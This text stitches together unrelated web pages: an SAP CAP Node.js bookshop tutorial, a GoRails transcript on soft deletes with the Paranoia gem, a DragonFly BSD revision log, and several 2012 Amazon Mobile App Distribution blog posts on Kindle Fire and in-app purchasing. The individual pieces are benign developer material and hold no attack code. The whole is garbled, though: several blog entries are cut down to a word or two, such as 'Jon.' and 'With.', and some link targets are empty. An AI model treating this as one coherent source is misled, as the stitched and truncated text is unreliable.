- Add custom handlers to serve requests that are not handled automatically

Before you start, make sure you have completed the prerequisites.

Configure the NPM registry by executing the following command:

  npm set @sap:registry=

Install the CDS command-line tools by executing the following command:

  npm i -g @sap/cds

This installs the cds command, which we will use in the next steps. To verify the installation was successful, run cds without arguments:

  cds

This lists the available cds commands. For example, use cds version to check the version you have installed.

Go to SAP Development Tools and download the CDS extension (vsix file) for Visual Studio Code. Install the extension in Visual Studio Code and look for the vsix file you downloaded. If you see a compatibility error, make sure you have the latest version of VS Code.

Open a command line window and run the following command in a folder of your choice:

  cds init my-bookshop

This creates a folder my-bookshop in the current directory. Open VS Code, go to File | Open Folder and choose the my-bookshop folder.

You will create a simplistic all-in-one service definition. In VS Code, choose the New File icon and type srv/cat-service.cds. This creates a folder called srv and a file called cat-service.cds.
Open the file and add the following code:

  using { Country, managed } from '@sap/cds/common';

  service CatalogService {
    entity Books {
      key ID : Integer;
      title  : localized String;
      author : Association to Authors;
      stock  : Integer;
    }
    entity Authors {
      key ID : Integer;
      name   : String;
      books  : Association to many Books on books.author = $self;
    }
    entity Orders : managed {
      key ID  : UUID;
      book    : Association to Books;
      country : Country;
      amount  : Integer;
    }
  }

Save your file.

Run your service locally. In the my-bookshop folder, execute:

  cds run

To test your service, go to. You won't see data, because you have not added a data model yet. However, click on the available links and confirm the service is running. To stop the service and go back to your project directory, press CTRL+C.

Add service provider logic to return mock data. In the srv folder, create a new file called cat-service.js. Add the following code:

  module.exports = (srv) => {
    // Reply mock data for Books...
    srv.on ('READ', 'Books', ()=>[
      { ID:201, title:'Wuthering Heights', author_ID:101, stock:12 },
      { ID:251, title:'The Raven', author_ID:150, stock:333 },
      { ID:252, title:'Eleonora', author_ID:150, stock:555 },
      { ID:271, title:'Catweazle', author_ID:170, stock:222 },
    ])
    // Reply mock data for Authors...
    srv.on ('READ', 'Authors', ()=>[
      { ID:101, name:'Emily Brontë' },
      { ID:150, name:'Edgar Allen Poe' },
      { ID:170, name:'Richard Carpenter' },
    ])
  }

Save the file. Run the CatalogService again:

  cds run

To test your service, click on these links: You should see the mock data you added for the Books and Authors entities. To stop the service and go back to your project directory, press CTRL+C.

To get started quickly, you have already added a simplistic all-in-one service definition. However, you would usually put normalized entity definitions into a separate data model and have your services expose potentially de-normalized views on those entities. Choose New File and type db/data-model.cds.
This creates a folder called db and a file called data-model.cds. Your project structure should look like this:

Add the following code to the data-model.cds file:

  namespace my.bookshop;
  using { Country, managed } from '@sap/cds/common';

  entity Books {
    key ID : Integer;
    title  : localized String;
    author : Association to Authors;
    stock  : Integer;
  }
  entity Authors {
    key ID : Integer;
    name   : String;
    books  : Association to many Books on books.author = $self;
  }
  entity Orders : managed {
    key ID  : UUID;
    book    : Association to Books;
    country : Country;
    amount  : Integer;
  }

Open cat-service.cds and replace the code with:

  using my.bookshop as my from '../db/data-model';

  service CatalogService {
    entity Books @readonly as projection on my.Books;
    entity Authors @readonly as projection on my.Authors;
    entity Orders @insertonly as projection on my.Orders;
  }

Remember to save your files. The cds runtime includes built-in generic handlers that automatically serve all CRUD requests. After installing the SQLite3 packages, you can deploy your data model.

Install the SQLite3 packages:

  npm i sqlite3 -D

Deploy the data model to an SQLite database:

  cds deploy --to sqlite:db/my-bookshop.db

You have now created an SQLite database file under db/my-bookshop.db. This configuration is saved in your package.json as your default data source. For subsequent deployments using the default configuration, you just need to run cds deploy.

Open SQLite and view the newly created database:

  sqlite3 db/my-bookshop.db -cmd .dump

If this does not work, check if you have SQLite installed. On Windows, you might need to enter the full path to SQLite, for example: C:\sqlite\sqlite3 db\my-bookshop.db -cmd .dump. To stop SQLite and go back to your project directory, press CTRL+C.

Add plain CSV files under db/csv to fill your database tables with initial data. In the db folder, choose New File and enter csv/my.bookshop-Authors.csv.
Add the following to the file:

  ID;name
  101;Emily Brontë
  107;Charlote Brontë
  150;Edgar Allen Poe
  170;Richard Carpenter

In the db folder, choose New File and enter csv/my.bookshop-Books.csv. Add the following to the file:

  ID;title;author_ID;stock
  201;Wuthering Heights;101;12
  207;Jane Eyre;107;11
  251;The Raven;150;333
  252;Eleonora;150;555
  271;Catweazle;170;22

Make sure you now have a folder hierarchy db/csv/.... Remember that the csv files must be named like the entities in your data model and must be located inside the db/csv folder.

Your service is now backed by a fully functional database. This means you can remove the mock data handlers from cat-service.js and see the generic handlers shipped with the SAP Cloud Application Programming Model in action. Remove the code with mock data in cat-service.js, because we want to see the actual data coming from the database.

Deploy the data model again to add your initial data:

  cds deploy

Run the service again:

  cds run

To test your service, open a web browser and go to: You should see a book titled Jane Eyre. If this is not the case, make sure you have removed the mock data from cat-service.js as indicated above.

Download the Postman application. Note that you can use any HTTP client other than Postman. Click on the following link and save the file to a folder of your choice: postman.json. In the Postman app, use the Import button in the toolbar. Choose Import from File in the wizard. Click on Choose Files and select the file that you saved before. In the imported collection, execute the various requests in the metadata and CRUD groups. They should all return proper responses. Note that with our current service implementation, we can only POST orders. Any GET or DELETE to an order will fail, since we have specified the Orders entity to be @insertonly in srv/cat-service.cds.
Add the following code in the srv/cat-service.js file:

  module.exports = (srv) => {
    const {Books} = cds.entities ('my.bookshop')

    // Reduce stock of ordered books
    srv.before ('CREATE', 'Orders', async (req) => {
      const order = req.data
      if (!order.amount || order.amount <= 0) return req.error (400, 'Order at least 1 book')
      const tx = cds.transaction(req)
      const affectedRows = await tx.run (
        UPDATE (Books)
          .set ({ stock: {'-=': order.amount}})
          .where ({ stock: {'>=': order.amount}, /*and*/ ID: order.book_ID})
      )
      if (affectedRows === 0) req.error (409, "Sold out, sorry")
    })

    // Add some discount for overstocked books
    srv.after ('READ', 'Books', each => {
      if (each.stock > 111) each.title += ' -- 11% discount!'
    })
  }

Whenever orders are created, this code is triggered. It updates the book stock by the given amount, unless there are not enough books left.

Run your service:

  cds run

In Postman, execute the GET Books request. Take a look at the stock of book 201. Execute one of the POST Orders requests. This will trigger the logic above and reduce the stock. Execute the GET Books request again. The stock of book 201 is lower than before.

Prerequisites
- You have installed Node.js version 8.9 or higher.
- You have installed the latest version of Visual Studio Code.
- (For Windows users only) You have installed the SQLite tools for Windows.

Steps:
- Step 1: Set up your local development environment
- Step 2: Install Visual Studio Code Extension
- Step 3: Start a project
- Step 4: Define your first service
- Step 5: Provide mock data
- Step 6: Add a data model and adapt your service definition
- Step 7: Add a Database
- Step 8: Add initial data
- Step 9: Test generic handlers with Postman
- Step 10: Add custom logic
https://developers.sap.com/korea/tutorials/cp-apm-nodejs-create-service.html
Episode 41 · February 5, 2015

Learn how to soft delete records instead of deleting them permanently from your database.

Today we're going to talk about a gem called Paranoia, and how you can use it to basically archive stuff in your application, or do soft deletes, as they're sometimes called. In previous episodes we've built this forum, and we have a bunch of forum threads, and if you click on a thread, there's posts by users, and we keep track of who created what, so the thread was created by me, Chris Oliver, and I made the first post, and then the second post was by "Test user", and we have a few conversations testing different things. What happens here is that if the test user deletes their account, and we can simulate that by:

  rails c
  User.last.destroy

Once we do that and we refresh the page, this is now broken, because we have forum_post.user.name in our view, and what this is saying is "undefined method 'name' for nil:NilClass", which means that we called name on something, and that thing was nil, so forum_post.user is nil. And if we look at the forum post, we have a user id, so it's trying to see that the user exists, and now when we call forum_post.user it does a query for users where ID is 2, and there is none. So we get nil, and then we say nil.name, and of course you get the same error as here. How do we go about solving this problem?
There's a handful of different ways you can do it, and one thing that you'll see for example on Reddit is to take this and put an if statement around it, so that rather than just putting out the user name, you could say: if forum_post.user.present?, then we will display forum_post.user.name, otherwise we'll just print out something like "Deleted User". This will return the "Deleted User" string when there is no user; otherwise, it will work as we expect, and we can go and update our views to do this. You can build a helper method for it, or make a presenter to make this a little prettier, but you're introducing if statements in your application, and you have to be aware of that, because that causes more problems down the road. Now we have this where it says "Deleted User", and this is updated. But when it comes to things like financial information, and you're recording payments and things like that, you actually can't just straight up delete your users, because you need their names and email addresses for things like that. That's something that you have to be very aware of, so what we're going to use in this episode is a gem called Paranoia. Now, there's an old gem called acts_as_paranoid that was rewritten by a handful of people, and it's a very lightweight gem now, and it's amazing; there's really not much to it. This is all there is: one file of code which is under 225 lines, so that's great, easy to debug and flexible enough.
Now this gem basically does soft deletes, or archiving, so rather than just straight up deleting the record from your database, you add a field called deleted_at, and if this field is null, then your record is not deleted, but if it does have a timestamp there, then that means that that record was deleted. What happens then is that you just adjust all of your queries, so if this thread for example had Paranoia on it, it could be deleted_at whenever, and then you could have the forum thread section only show the ones that aren't deleted. So let's go ahead and add this to our application. I'm going to grab the latest version of the paranoia gem. Let's undo the change that we just made there, and then jump into the bottom of our Gemfile, add in paranoia, and here I'm actually going to go create that user again, so that we can delete them and test things out once more:

  User.create email: "[email protected]", first_name: "Test", last_name: "User", password: "password", password_confirmation: "password"

  bundle install

We've got our rails server restarted, and now we need to go run a migration to add the deleted_at columns to our models. Let's first do this with forum threads, and we'll see how we can apply that to users in a similar fashion. We generate a migration:

  rails g migration AddDeletedAtToForumThreads deleted_at:datetime
  rake db:migrate

We run that with bundle exec rake db:migrate because I have multiple versions of rake installed, and now that that's finished, we can hop back over to Chrome and take a look at what it requires to add this to our model. Another thing we want to do is add the index that I missed, so to do that in development, we can just rake db:rollback (again with bundle exec), so we'll roll back adding the deleted_at column, and then we'll open up the migration that we just created, and paste in the add_index :forum_threads, :deleted_at line.
This index is important since you're going to be querying on this field all the time. You're always going to look for whether it's null or not, basically. This index will help the database index that column so that all your queries are faster, and it's very, very important that you add that. So we can take the acts_as_paranoid line and put it into our forum_thread.rb. Run bundle exec rake db:migrate; the "be" shortcut is because I'm using zsh, and it comes with a shortcut for that. Now we can go back to our forum threads, and if you look at the documentation, when you call destroy, it just sets the deleted_at timestamp, and that's all. Now we can go in here, and I forgot to update the user's id to match the one that we had before: when I created the last user it got an id of 4, but we need to update it because the original id was 2, so we'll change the user over to that, and we're back in the same state we were before deleting the record, and you can see how much trouble it causes when you delete records like that. So going back out to the forum threads index, let's go and grab ForumThread.last, which is our "episode 26 announcement", and delete this forum thread:

  ForumThread.last.destroy

So we did that, but the record came back; it still exists, and this time it has the deleted_at timestamp. If we come back to our page, you can see that it disappeared, and the reason it disappeared is because Paranoia sets a default scope, which isn't mentioned in the README here, but there are a handful of other scopes that you can use. There's with_deleted and only_deleted, and these will give you either all records or only the deleted records, and by default the scope is modified so that you only get undeleted records. Now we need to take a little look at this and see what happens. We deleted id number 3, and if we go and view that page, it's no longer available.
This has actually changed our full scope here, so when we say ForumThread.find(3), it can't find it and we get an "ActiveRecord::RecordNotFound" error, so it couldn't find id 3, but if you notice here, it's also adding the condition that the deleted_at column needs to be null. So imagine that you have an admin account on the application, and you want to say ForumThread.with_deleted.find(3); you'll actually get it back. So maybe admins use the with_deleted scope, and the rest of the users only see stuff that is not deleted, and maybe you have a section in your application for archived threads, where only the deleted ones are listed. This is really nifty because it allows us to do a lot of stuff like this. And what if we want to restore that forum thread? ForumThread.restore(3) updates the record's deleted_at to nil, so it comes back. Now we want to go and see how to delete users, because that's what we started with. Forum threads are a little bit simpler because we're accessing the records directly from the model. With users, though, we're going through the thread or the post, and we're trying to talk to the association, and we have to override our association to handle this, because we need to include with_deleted in this case.
Let's go ahead and add our migration in here:

  rails g migration AddDeletedAtToUsers deleted_at:timestamp

db/migrate/add_deleted_at_to_users:

  def change
    add_column :users, :deleted_at, :timestamp
    add_index :users, :deleted_at
  end

  rake db:migrate

Now our users will be able to be soft deleted, and we'll have to go to the user model and add in the acts_as_paranoid method in there. Once we've done that, we can run our rails console and grab that last user:

  User.last.destroy

They've been deleted, and now when we visit this page, we get the same error that we started with, and that's a little annoying, because we know the record exists. In this case, it's a public forum, so if you delete your account, that's fine, but we can still keep your post up or show your name; we'll just go with that, because the content is public anyway. In some cases, you may want to truly delete it and replace these with placeholders, or just not show this post, for example, but in our case we want to display the content whether it's deleted or not. The way we do that is to open up app/models/forum_post.rb, and we need to override the getter that the belongs_to :user sets for us. If you understand how belongs_to works, you have a def user=() that takes an argument, and a def user that doesn't take any arguments, and the getter is what returns the User.find on the user id. So this user getter is basically just calling User.find using the user_id column. It's as simple as that: it looks at the symbol, adds "_id", and then basically generates a method behind the scenes that does that. user= is very similar; it saves the user's id into the user_id column on the forum post, and so on. You can create the user methods like that, but you can also override them.
So belongs_to you could create by hand if you wanted, but we have this helpful association shortcut. It doesn't allow us to find users that are deleted, though, so we can say this instead:

  def user
    User.with_deleted.find(user_id)
  end

This should allow us to refresh the page, and now it still shows "Test User" there, so that's cool. This is one way of doing it; the example in the paranoia gem's documentation is to use User.unscoped { super }, which I think is a better solution:

  def user
    User.unscoped { super }
  end

super calls the original method that we're overriding, and that original method would be the one from belongs_to. If we come back and refresh this page, it works as we expected, and I would recommend using their example to do this, because unscoped basically removes the deleted_at = null condition and then runs the original query. Now, the way you implement this is going to be very application-specific. If you're doing things like Stripe would with payments, you probably want to keep those records around; on the other hand, if you're doing something like a forum, you may want to actually delete the user's account permanently. Paranoia is a perfect gem to straddle that balance: you can use it at will on any models that you want, and you have all of these helper methods and other things like really_destroy! to actually delete the record. It provides all of those things that you could want from a soft delete library, and I'm really, really happy with it; they've done a great job on it. I hope this helps and you're able to add soft deletes into your applications as well.

Transcript written by Miguel
https://gorails.com/episodes/soft-delete-with-paranoia
Up to [DragonFly] / src / sys / dev / video / meteor
Keyword substitution: kv
Default branch: MAIN

Revision log:
- Fix numerous spelling mistakes.
- functions to avoid conflicts with libc.
- Remove all occurences of double semicolons at the end of a line by single ones. Submitted-by: Bill Marquette <bill.marquette@gmail.
- Comment out extra token at end of #endif.
- Fix format string
- lets go ahead and commit this before we hit the network interfaces
- __P removal
- Add or correct range checking of signal numbers in system calls and ioctls.
- Add the DragonFly cvs id and perform general cleanups on cvs/rcs/sccs ids. Most ids have been removed from !lint sections and moved into comment sections.
- import from FreeBSD RELENG_4 1.49
http://www.dragonflybsd.org/cvsweb/src/sys/dev/video/meteor/meteor.c?f=h
November 19, 2012 - Amazon Mobile App Distribution Program

Integrating Amazon's In-App Purchasing and Amazon GameCircle APIs into mobile games is easy, but we're always working to make it even quicker and easier. Today, we're pleased to announce the release of new plug-ins for the In-App Purchasing and GameCircle APIs for the Unity game engine. If you build your games with Unity, you can now use these plug-ins to rapidly add both In-App Purchasing for virtual goods and GameCircle for leaderboards, achievements, and Whispersync for Games. Unity Technologies' game engine is one of the most popular tools for creating games. It enables you to easily create rich, interactive 3D experiences by providing ways to assemble your art and assets into scenes and environments, add physics, and simultaneously play-test and edit games. When you're finished building and testing, the Unity engine creates a binary targeted for your chosen platform, like an Android APK, which you can publish to Kindle Fire and the Amazon Appstore for Android. The new plug-ins for Unity are available today for free as part of the Amazon Mobile App SDK. You can download the latest version here. Just follow the simple instructions in the documents to get started. Of course, you'll also need the Unity game engine in order to use the plug-ins. If you haven't tried it yet, you can download a free version of Unity here. Sign in to your Amazon Mobile App Distribution Portal account now to get started.

November 18, 2012 - Amazon Mobile App Distribution Program

CJ Frost, Technical Evangelist for Amazon Kindle, is our guest blogger for this post. Kindle Fire tablets are designed to be rich content consumption devices. To make sure your app supports this goal and provides the best user experience, keep in mind that you are building for a tablet, not a smartphone. Many apps are derived from existing Android smartphone apps and do not scale well to the tablet form factor.
Scaled apps generally do not look as good as dedicated tablet apps and are feature-limited when compared to a similar app designed specifically for a tablet environment. These scaled apps can also suffer from significant degradation in graphics quality as the UI and its elements are dynamically scaled up, by the Android platform, to fit the screen. Optimizing your app for tablets offers numerous benefits: it enables you to offer a rich, easy-to-navigate, and more detailed user experience, allows you to optimize user engagement, and can potentially improve your monetization opportunities. To help you create the best user experience for both small and larger screened devices, we've put together a list of our top phone-to-tablet app development tips.

Exploit the real estate. Many mobile phone apps are designed as lists of items (e.g., postings, photos) that link to new pages. When viewed on a Kindle Fire tablet, these apps appear feature-limited by comparison: the lists do not fill the screen, nor do they take advantage of the potential user experience features. Apps designed to be multi-pane leverage the screen real estate so users can directly open content they'd otherwise page to on a phone app. For more information on how to design your app for larger screens, see the Android documentation on devices and displays, planning for multiple touchscreen sizes, and moving from multi-page to multi-pane designs.

Optimize for dynamic resizing. Apps designed for phones tend to be created as portrait apps only.
Apps designed for tablets are optimized to be viewed in portrait or landscape mode by providing orientation-specific layouts, as demonstrated in the Simple RSS Reader Sample, and resize dynamically using the accelerometer to sense orientation. Apps designed primarily for use on phones can also suffer from significant degradation in graphics quality as the UI and elements are dynamically scaled up, by the Android platform, to fit the screens of larger devices. For more information on how to design your app for dynamic resizing, see the Android documentation on supporting different screen sizes.

Design for interactivity. Apps designed for phones are intended to be used with one hand and provide single-point touch elements with larger touch targets to accommodate thumb navigation. In contrast, apps designed for tablets are developed using multi-point touch elements that can accommodate tablet users' normal two-handed pinch-zoom and swipe actions, providing a richer and more dynamic user experience. For more information on how to design your app for interactivity, see the Android documentation on making interactive views.

Increase your reach. Apps designed for phones tend to provide a static representation of non-interactive content. Apps designed for tablets offer additional opportunities for interactivity and can help you extend the reach of your business by including partner content, such as ads or additional game offerings, as well as interactive applets, in a multi-pane design.

November 14, 2012 - Amazon Mobile App Distribution Program

Starting today, the Kindle Fire HD 8.9" will begin shipping to customers. Kindle Fire HD 8.9" offers a 1920x1200 HD resolution display, with Dolby audio and dual stereo speakers. There's also Kindle Fire HD 8.9" 4G, which offers ultra-fast 4G LTE wireless from AT&T.
This rounds out our new selection of Kindle Fire tablets, including the all-new Kindle Fire and the Kindle Fire HD, which has already become the best-selling item on Amazon worldwide. Make sure your apps are ready. We've provided tools to optimize your app for Kindle Fire tablets, including the Kindle Fire HD 8.9". For a full list of resources available, read our blog post from the Kindle Fire tablet announcement here.

November 13, 2012 - Amazon Mobile App Distribution Program

Jon.

November 11, 2012 - Amazon Mobile App Distribution Program

Jeremy Cath, Technical Evangelist for Amazon Kindle, is our guest blogger for this post. How quickly your app starts is a significant factor in creating a good impression for your customers, especially if they use your app frequently. To help your app start quickly, consider the following best practices. Show a minimal experience as fast as possible: some of the user perception of performance comes from how fast an app displays something after the user launches it, so showing a minimal splash screen as soon as possible, while the rest of the initial experience is loading, makes startup appear more responsive. The Android activity life cycle looks like this: [activity life cycle diagram] So one of the most effective ways to optimize startup time is to minimize the tasks that take place in onCreate() and onStart(). If your full activity takes some time to display, starting with a minimum experience and transitioning to the main part of your application gives the user the impression of a responsive app. One solution is described below. For a fuller version, download the Kindle Fire sample code and see the SampleSplashScreen sample.

<activity android:name=".Min"
          android:label="@string/title_activity_min"
          android:theme="@style/Theme.MinBackground">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
    </intent-filter>
</activity>
<activity android:name=".Full" />

Note the use of the theme "MinBackground." This should be defined in theme.xml.
<style name="Theme.MinBackground" parent="android:Theme">
    <item name="android:windowBackground">@color/gray</item>
    <item name="android:windowNoTitle">true</item>
</style>

And the color "gray" can be defined in color.xml.

<color name="gray">#444444</color>

"Min" should be as simple as possible, for example (min_layout.xml):

<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    android:layout_width="match_parent"
    android:layout_height="match_parent">
</RelativeLayout>

You could add a logo or text to this screen, but the overall goal is to make it lightweight and fast. The launcher will invoke Min when starting the app. Inside Min you can then invoke Full (in a thread), which will display once loaded, by doing this:

public class Min extends Activity {
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // Hide the soft keys and status bar.
        getWindow().setFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN,
                WindowManager.LayoutParams.FLAG_FULLSCREEN);

        // Display this activity.
        setContentView(R.layout.min_layout);

        // Create a thread to do the heavy lifting and then
        // start the Full activity.
        final Thread workerThread = new Thread() {
            @Override
            public void run() {
                // Call a method to perform the work.
                Min.this.loadResources();

                // Start the full Activity.
                Min.this.startActivity(new Intent(Min.this, Full.class));

                // Avoid the flash back to the home screen.
                Min.this.overridePendingTransition(0, 0);

                // Never come back to this Activity.
                Min.this.finish();
            }
        };
        workerThread.start();
    }
}

To tune startup "under the covers," consider the following tips:

// BAD!
static CacheManager sCacheManager = new CacheManager();

// better
static CacheManager sCacheManager = null;

public static CacheManager getCacheManager() {
    if (sCacheManager == null) {
        sCacheManager = new CacheManager();
    }
    return sCacheManager;
}

If your app relies on network-loaded resources, use a persistent cache to avoid a network call during startup.
This also applies within the app in general: avoid relying on a network connection if the assets can be retained locally; this will improve performance while reducing the user's bandwidth consumption. On the Android platform, static methods have been demonstrated to perform up to 20% faster than virtual methods (see here for more information). To help you identify areas that need work in your app, there are a couple of handy tools that you should become familiar with: StrictMode will help you identify bad practices in the UI thread, such as accessing the network or disk. For information on how to use StrictMode, see the StrictMode documentation. Traceview can be used to profile what is happening in your app. For information on how to use Traceview, see the Traceview documentation. As an example, Traceview can be used to measure startup time programmatically. Traceview introduces overhead on its own, and as such is not terribly useful for making absolute statements about time (e.g., that XYZ takes 10ms). It is useful for finding hotspots and (mostly) for comparing relative runtimes of sections of code. Also, it's worth noting that the overhead is only introduced on the Java side. Native methods run as quickly as they normally do, so native calls end up appearing to take a smaller percentage of runtime than they actually take.

November 07, 2012 - Amazon Mobile App Distribution Program

With. Image support has also been improved. In addition to all the expected browser image formats, we now support SVG via both the HTML5 <svg> tag and .svg resources in <img> tags.

November 04, 2012 - Amazon Mobile App Distribution Program

Amazon customers are familiar with our personalized product recommendations—they're front and center for customers on Amazon.com, as well as the Amazon Appstore for Android's web store.
Amazon's recommendation engine ensures that each customer receives suggestions of other products based on their past purchases, making shopping convenient and allowing them to discover new products that they may be interested in. The same recommendation technology is now included on the Kindle Fire HD and all-new Kindle Fire. Customers will see recommendations of other apps that they may enjoy right on the carousel of the Kindle Fire HD and all-new Kindle Fire. In the example below, you can see that customers who are downloading USA TODAY also commonly download TuneIn Radio Pro, Scrabble, and CalenGoo. From within the "Apps" category, customers are presented with another way to discover new apps. There's the "Recommended for You" section, featuring apps personalized to the customer's past downloads, and "New for You", specifically featuring only new apps that they may be interested in. Recommended apps are also featured on every app's product page on the web, on Kindle Fire tablets, and in our smartphone app. Apps are featured in the "Customers Who Bought This App Also Bought" section based on similarities between customers downloading your apps and other apps on Amazon. For example, customers who downloaded Scope also consistently download Minecraft – Pocket Edition, Temple Run: Brave, and textPlus GOLD. This extends outside of just the Amazon Appstore too: if customers are buying any product on Amazon and also buying your app, the recommendation will show there, and vice versa. This means you may see toys or books within this area on your app, or your app may be featured similarly on a product in the Home or Video Games stores. Improving app discovery is just another way that Amazon helps you grow your business. As a developer, all you need to do is submit your apps in the Mobile App Distribution Portal. We will take care of making sure your apps are presented in front of the right customers.
October 31, 2012 - Amazon Mobile App Distribution Program

You might have already heard about the 6th AWS Global Start-Up Challenge, which is now accepting entries for this year's contest. This contest, launched in 2007, is a way for promising start-ups to get noticed and compete for an opportunity to win some great rewards. This year, Amazon Web Services will select four grand prize winners, one from each of the following categories: Each grand prize winner will be awarded $50,000 in cash, $50,000 in AWS credits, as well as AWS Business Support services for one year and technical mentorship from AWS. The final judging event for the Challenge will include representatives from VC firms such as Sequoia, First Round Capital, and Madrona. After the final judging round, we will be hosting a finale event at Dog Patch Wine Works in San Francisco, CA, where we will announce the 4 Grand Prize Winners. Here, the 12 finalists will get to present to a large audience of start-ups, entrepreneurs, and like-minded business professionals. This event is open to everyone to attend, and registration will be announced shortly. Don't miss your chance to win big. Learn more about this year's Challenge and enter on the contest site. The deadline to enter is 11:59:59 P.M. (PT) on Wednesday, December 5, 2012. If you have more questions about the contest or your entry application, please refer to the Official Rules, the Frequently Asked Questions page, or email awsstartups@amazon.com. Interested? Get started here. In addition to sessions on developing for Kindle Fire tablets, there are also great sessions at AWS re:Invent specifically for start-ups. Whether your start-up is running on AWS today or you're prototyping your mobile app, AWS re:Invent is the place to learn how to build and scale your business on the AWS Cloud.

October 30, 2012 - Amazon Mobile App Distribution Program

Mudeem Siddiqui, Solutions Architect, a2z Development Center Inc., an Amazon.com company, is our guest blogger for this post.
initiatePurchaseUpdatesRequest is an important API call that enables developers to restore in-app purchases. A common use case for this method is when a customer buys in-app items on one device and then downloads the same app on another device, or when a customer re-installs the app after removing it from their device. In both scenarios, the initiatePurchaseUpdatesRequest() call lets the app retrieve past in-app purchases and restore those purchases to the correct state. Consider a scenario where a freemium app uses the In-App Purchasing API to grant an entitlement to the full version of the app. A customer downloads the free version and unlocks the full version through an in-app purchase. Then, they remove the app from their device. The customer then re-installs the app from the cloud. If the initiatePurchaseUpdatesRequest call is used correctly, the customer will have a seamless experience and have access to the full version of the app without taking any action. This is a great customer experience. On the contrary, if the call is not used, or is used incorrectly, the customer will not have access to content they've already purchased. Instead, the customer will be presented with the free version and the option to purchase the full version. This is a bad customer experience and could lead to negative reviews. Make the PurchaseUpdates call whenever the onResume() activity lifecycle method is invoked, and determine whether the customer has already purchased any entitlements and subscriptions. Based on the result, lock/unlock content in the app as appropriate. Here are the technical details of how to use the PurchaseUpdates API calls:

1. Override and implement the onPurchaseUpdatesResponse callback: In the Observer class that extends BasePurchasingObserver, override and implement the callback onPurchaseUpdatesResponse. This callback will be invoked on completion of the purchase updates request.

private class MyObserver extends BasePurchasingObserver {
...
//
// Is invoked once the call from initiatePurchaseUpdatesRequest is completed.
// On a successful response, a response object is passed which contains the request id, request
// status, a set of previously purchased receipts, a set of revoked skus, and the next offset if
// applicable. If a user downloads your application to another device, this call is used to sync
// up this device with all the user's purchases.
//
// @param purchaseUpdatesResponse
//            Response object containing the user's recent purchases.
//
@Override
public void onPurchaseUpdatesResponse(PurchaseUpdatesResponse purchaseUpdatesResponse) {
    for (final String sku : purchaseUpdatesResponse.getRevokedSkus()) {
        // Revoke items here.
    }
    switch (purchaseUpdatesResponse.getPurchaseUpdatesRequestStatus()) {
    case SUCCESSFUL:
        for (final Receipt receipt : purchaseUpdatesResponse.getReceipts()) {
            switch (receipt.getItemType()) {
            case ENTITLED:
                // If the receipt is for an entitlement, the customer is re-entitled.
                // Add re-entitlement code here.
                break;
            case SUBSCRIPTION:
                // Purchase updates for subscriptions can be handled here in one of two ways:
                // 1. Use the receipts to determine if the user currently has an active subscription.
                // 2. Use the receipts to create a subscription history for your customer.
                break;
            }
        }
        break;
    case FAILED:
        // Failure case.
        break;
    }
}
...
}

NOTE: Please be aware that this method is invoked on the UI thread. Any long-running tasks should run on another thread. It is best practice to use AsyncTask to implement the onPurchaseUpdatesResponse functionality. Please see the ButtonClicker example for details.

2. Initiate the purchase updates request: initiatePurchaseUpdatesRequest initiates a request to retrieve updates about items that the customer has purchased. A good place to call this function is from the onGetUserIdResponse() callback, where initiateGetUserIdRequest() should be called from onResume() in the MainActivity to check which customer has signed in.
Chaining these calls ensures that you can correlate the user to the purchased content.

public class MainActivity extends Activity {
    ...
    // When the application resumes, check which customer is signed in.
    @Override
    protected void onResume() {
        super.onResume();
        PurchasingManager.initiateGetUserIdRequest();
    }
    ...
}

private class MyObserver extends BasePurchasingObserver {
    ...
    @Override
    public void onGetUserIdResponse(final GetUserIdResponse getUserIdResponse) {
        ...
        PurchasingManager.initiatePurchaseUpdatesRequest(...);
        ...
    }
}

The argument to initiatePurchaseUpdatesRequest is an offset. The offset represents a position in a set of paginated results. Operations that make use of an offset as input will provide an offset as an output, and you can use that offset to get the next set of results. To reset an offset, you can pass in Offset.BEGINNING. It is a best practice to keep track of the current offset within your app and use that offset for subsequent calls. It is also a best practice to associate an offset with a UserID in the event multiple customers share the same physical device. Offset values are base64-encoded and are not human readable. NOTE: It's a best practice to have the onGetUserIdResponse implementation in an AsyncTask. In that case, initiatePurchaseUpdatesRequest() should be called from the onPostExecute() function of the AsyncTask. For a comprehensive example, see the ButtonClicker sample that is part of the In-App Purchasing API.

October 29, 2012 - Amazon Mobile App Distribution Program

Kate Shoaf, Marketing and Public Relations leader at PlayTales, is our guest blogger for this post. PlayTales is a world leader in children's bookstore apps and has expanded internationally, with offices in the USA, UK, Spain, Romania, and China. Founded in 2010, PlayTales develops and distributes interactive playable storybooks for children within the world's leading children's bookstore app for smartphones and tablets.
International distribution has become a prominent part of PlayTales' business plan as we've realized the international market can open the door to millions of downloads for our apps. Although we developed the app with the intention of mainly distributing in the USA, China and the UK have become some of our top downloaders. We've developed and localized our app to cater to the needs of our various international customers. Based on our experiences, there are several things developers should consider as they prepare and launch their applications: A unique feature of our app is the several language options users can choose from. The selected language of the application is based on the settings of the user's device, but within the application itself, you can choose to view the stories in a different language. For example, all of your menus and links are in English, but you can easily view all stories in their Spanish version, French version, Italian version, and so on. We know our target users are interested in exposing their children to various languages, so we've developed our app to make this possibility easily attainable. If you look at this screen shot, you'll notice that all menu items are in English, while the books are available in Spanish; a unique feature that caters to our target user. Anyone can learn a new language, but when it comes to common phrases and appropriate expressions, we've found that working with native speakers is the best method for localization. At PlayTales we translate our stories into eight different languages, and there is no substitute for working with a native speaker. When translators become a part of your localization team, they understand the message and product quality you are trying to develop within your app. With the current economic crisis, it seems that currencies all over the world are constantly on a roller coaster of changing value.
